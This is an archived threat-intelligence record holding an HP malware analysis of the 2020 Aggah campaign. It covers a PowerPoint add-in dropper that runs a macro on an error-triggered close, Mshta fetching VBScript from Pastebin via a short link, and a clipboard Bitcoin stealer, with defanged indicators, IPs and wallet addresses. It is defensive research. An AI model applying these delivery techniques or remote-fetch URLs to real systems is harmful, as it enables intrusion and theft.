{ "id": "2faa6242-cb57-4773-bd36-b90aaae3b6b5", "created_at": "2026-04-06T00:12:36.410853Z", "updated_at": "2026-04-10T13:12:43.384304Z", "deleted_at": null, "sha1_hash": "1db17a44207946c9b5c54fd1b31fcdd141ecc8ab", "title": "Aggah Campaign’s Latest Tactics: Victimology, PowerPoint Dropper and Cryptocurrency Stealer", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1111350, "plain_text": "Aggah Campaign’s Latest Tactics: Victimology, PowerPoint Dropper and\r\nCryptocurrency Stealer\r\nBy Alex Holland\r\nPublished: 2020-07-01 · Archived: 2026-04-05 23:18:21 UTC\r\nA notable PowerPoint malicious spam campaign we investigated recently was detected by HP Sure Click in May 2020. Its\r\ntactics, techniques and procedures (TTPs) suggest that the activity is linked to threat actors behind a string of similar\r\ncampaigns, known collectively as the Aggah campaign.  In this campaign, malicious PowerPoint Add-in files were used to\r\ndeliver Agent Tesla and PowerShell cryptocurrency-stealing malware.\r\nThe use of PowerPoint malware is significant because it’s uncommon. Of the office document malware isolated by HP Sure\r\nClick in 2020 so far, only 1% was PowerPoint malware (Figure 1). Most (65%) of the office document malware seen in the\r\nwild uses Microsoft Word file formats, such as DOC, DOCX and DOCM, followed by Excel formats.\r\nAlthough aspects of the May 2020 Aggah campaign have been analysed elsewhere, information about the attacker’s email\r\ninfrastructure and campaign victimology is difficult to find. HP Sure Click telemetry suggests that the sectors and countries\r\ntargeted by the threat actor behind this latest campaign are broader than previously thought. We also analysed the differences\r\nfrom previous Aggah campaigns. The most significant alterations found were the use of a PowerPoint-based dropper instead\r\nof Word- or Excel-based droppers, and the new inclusion of a PowerShell Bitcoin stealer.\r\nFigure 1 – Proportion of office document threats by type, based on HP Sure Click telemetry.\r\nTargeting and Victimology\r\nHP Sure Click isolated PowerPoint presentations tied to the May 2020 Aggah campaign that were named according to the\r\nregular expressions below. All the files shared the same hash value (SHA-256\r\n7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3).\r\nMoglix Purchase Order \\d{6}\\.(pps|ppt)\r\nPO – \\d{6}\\.(pps|ppt)\r\nBank details\\.ppt\r\nPayment Details\\.pps\r\nhttps://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/\r\nPage 1 of 6\n\nNew order GLT srl_\\d{7}_\\d{2}\\.\\d{2}.\\d{4}\\.ppt\r\nScan emco Bautechni specifications\\.pps\r\nFigure 2 – Some of the detected samples shown in HP Sure Controller.\r\nAn analysis of the organisations that were targeted by the campaign shows that the targets belonged to six sectors, the most\r\ncommon being manufacturing. From HP Sure Click telemetry, the targets were located in eight countries, predominantly in\r\nEurope (Figure 3).\r\nFigure 3 – Observed Aggah campaign infrastructure and targets in May 2020.\r\nhttps://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/\r\nPage 2 of 6\n\nTo make the phishing emails look more legitimate, the attacker spoofed the domains of five business-to-business (B2B)\r\ncompanies in the same or a related industry as the targets. The industries and locations of the spoofed organisations indicate\r\nthat the attacker likely sought to target businesses instead of individuals across many sectors. The organisations that were\r\nimpersonated are based in the following countries, indicating a large geographic spread:\r\nFrance\r\nGermany\r\nUnited Arab Emirates\r\nIndia\r\nSome of the recipient mail servers reported that the emails failed Sender Policy Framework (SPF) validation, meaning they\r\ndetected that the sender domains in the Return-Path field were spoofed. However, in several cases the emails were still\r\ndelivered to employees’ mailboxes, which suggests that some of the target organisations had not implemented a policy of\r\nrejecting mail if it failed an SPF check. We observed emails being sent from the following mail servers:\r\nhwsrv-721609.hostwindsdns[.]com (192.119.91[.]236)\r\nhwsrv-722288.hostwindsdns[.]com (192.119.106[.]136)\r\n172.241.27[.]218\r\n172.93.201[.]103\r\n172.93.201[.]113\r\nPowerPoint Dropper – Using Errors to Run Malware\r\nThe dropper used in this campaign was noteworthy because its execution relied on intentionally triggering a PowerPoint\r\napplication error when the presentation was opened. The error caused PowerPoint to close the presentation, generating an\r\nAuto_Close event that was used to run a malicious Visual Basic for Applications (VBA) macro.\r\nTo achieve this, the dropper was implemented as a PowerPoint 97-2003 Add-in (.PPA) that had been renamed to use .PPS\r\n(PowerPoint 97-2003 Slide Show) or .PPT (PowerPoint 97-2003 Presentation) file extensions. The advantage of using the\r\nPPA format is that unlike other PowerPoint formats, Auto_Open and Auto_Close VBA subroutines are available, meaning an\r\nattacker can trigger the execution of a malicious macro when a user opens or closes the presentation.\r\nIn this case, when the presentation is closed, a subroutine called “Page” is executed (Figure 4).\r\nFigure 4 – Auto_Close and “Page” subroutines.\r\nWhen opened, PowerPoint raises an error saying that the file cannot be read (Figure 5). Clicking the OK or Close button\r\ncloses the presentation, causing the macro to run in the background before closing PowerPoint. Using this error as a way of\r\nrunning the macro was likely intended by the attacker because the presentation does not contain any decoy content.\r\nhttps://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/\r\nPage 3 of 6\n\nFigure 5 – Error raised by PowerPoint when opening the dropper.\r\nThe VBA code used to download the next stage of malware is implemented in the “Page” subroutine (Figure 6). The\r\nsubroutine is minimally obfuscated and does not contain any sandbox detection. When run, it creates a WScript.Shell object\r\nand then uses the Run method to execute a remotely hosted VBScript loader using Mshta (T1170). Mshta is a Microsoft\r\nutility that is used to run HTML Applications and interpreted languages such as VBScript and JScript. The VBScript was\r\nhosted on Pastebin (hxxps://pastebin[.]com/raw/Bnv7ruYp) and accessed via a URL redirect\r\n(hxxp://j[.]mp/dmdmcrcrcryctcgufyguhmd) that was created using the j[.]mp URL shortening service.\r\nFigure 6 – “Page” subroutine that uses Mshta to run VBScript hosted on Pastebin.\r\nCryptocurrency Stealer – BitcoinClipboardMalware\r\nA new addition to the Aggah campaign is the inclusion of a cryptocurrency stealer. This is implemented in a PowerShell\r\nscript that is downloaded and run after the target computer has been compromised (Figure 7).  The script monitors the\r\nvictim’s clipboard for Bitcoin addresses and replaces them with the attacker’s address in the hope that the victim\r\ninadvertently transfers Bitcoin to the attacker. The script was possibly copied from a deleted GitHub project called\r\nBitcoinClipboardMalware, which matches the script used in the campaign (Figure 7). In this case, attacker’s address was\r\n19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W.\r\nFigure 7 – Deobfuscated Bitcoin stealer PowerShell script.\r\nhttps://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/\r\nPage 4 of 6\n\nOn 18 May, 0.00311321 Bitcoin was transferred into the attacker’s address, possibly from a victim. Fortunately, the amount\r\ntransferred was small, worth approximately $28 USD. Since Bitcoin transactions are public, it is possible to trace this\r\ntransaction back to a cryptocurrency exchange. On 16 June, the balance in the attacker’s wallet transferred to another\r\nBitcoin address (1PGRpP14sSBER6x2choH31wkML1hXqykNj), likely an intermediary wallet (Figure 8).\r\nFigure 8 – Transfer of the Bitcoin from the attacker’s wallet to an intermediary address.\r\nOn 17 June, the balance was transferred to a Bitcoin address associated with Binance\r\n(1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s), a cryptocurrency exchange that allows users to buy and sell\r\ncryptocurrencies (Figure 9).\r\nFigure 9 – Transaction showing a transfer of Bitcoin to an address associated with Binance.\r\nConclusion\r\nSince first being documented in 2019, Aggah has undergone several changes while still maintaining some consistent TTPs,\r\nsuch as a preference for hosting scripts and payloads on Pastebin, obfuscating URLs using URL shortening services, and\r\nusing Mshta.exe for code execution. The move to a PowerPoint dropper and the inclusion of a Bitcoin stealer is another\r\nhttps://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/\r\nPage 5 of 6\n\nevolution of Aggah. In this latest campaign, the attacker chose to impersonate B2B companies in Europe, the Middle East\r\nand Asia which suggests they did not intend to compromise organisations in a specific region. The sectors and locations of\r\nthe victims also indicates that the attacker sought to compromise businesses in a variety of industries from manufacturing to\r\nagriculture.\r\nIndicators of Compromise\r\nIndicator SHA-256 Hash Pu\r\nPowerPoint attachment (PPS and PPT file\r\nextensions)\r\n7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3 Dr\r\nhxxp://j[.]mp/dmdmcrcrcryctcgufyguhmd\r\nUR\r\nred\r\nlea\r\nto\r\nVB\r\nloa\r\nhxxps://pastebin[.]com/raw/Bnv7ruYp\r\nVB\r\nloa\r\n19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W  \r\nAg\r\nBit\r\nadd\r\nhwsrv-721609.hostwindsdns[.]com\r\n(192.119.91[.]236)\r\n \r\nAg\r\nma\r\nser\r\nhwsrv-722288.hostwindsdns[.]com\r\n(192.119.106[.]136)\r\n \r\nAg\r\nma\r\nser\r\n172.241.27[.]218  \r\nAg\r\nma\r\nser\r\n172.93.201[.]103  \r\nAg\r\nma\r\nser\r\n172.93.201[.]113  \r\nAg\r\nma\r\nser\r\nSource: https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/\r\nhttps://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/" ], "report_names": [ "aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer" ], "threat_actors": [ { "id": "b0d34dd6-ee90-483b-bb6c-441332274160", "created_at": "2022-10-25T16:07:23.296754Z", "updated_at": "2026-04-10T02:00:04.526403Z", "deleted_at": null, "main_name": "Aggah", "aliases": [ "Operation Red Deer", "Operation Roma225" ], "source_name": "ETDA:Aggah", "tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Aggah", "Atros2.CKPN", "Bladabindi", "Jorik", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "Origin Logger", "Revenge RAT", "RevengeRAT", "Revetrat", "Warzone", "Warzone RAT", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2", "created_at": "2023-06-20T02:02:10.254614Z", "updated_at": "2026-04-10T02:00:03.365336Z", "deleted_at": null, "main_name": "Hagga", "aliases": [ "TH-157", "Aggah" ], "source_name": "MISPGALAXY:Hagga", "tools": [ "Agent Tesla" ], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434356, "ts_updated_at": 1775826763, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1db17a44207946c9b5c54fd1b31fcdd141ecc8ab.pdf", "text": "https://archive.orkl.eu/1db17a44207946c9b5c54fd1b31fcdd141ecc8ab.txt", "img": "https://archive.orkl.eu/1db17a44207946c9b5c54fd1b31fcdd141ecc8ab.jpg" } }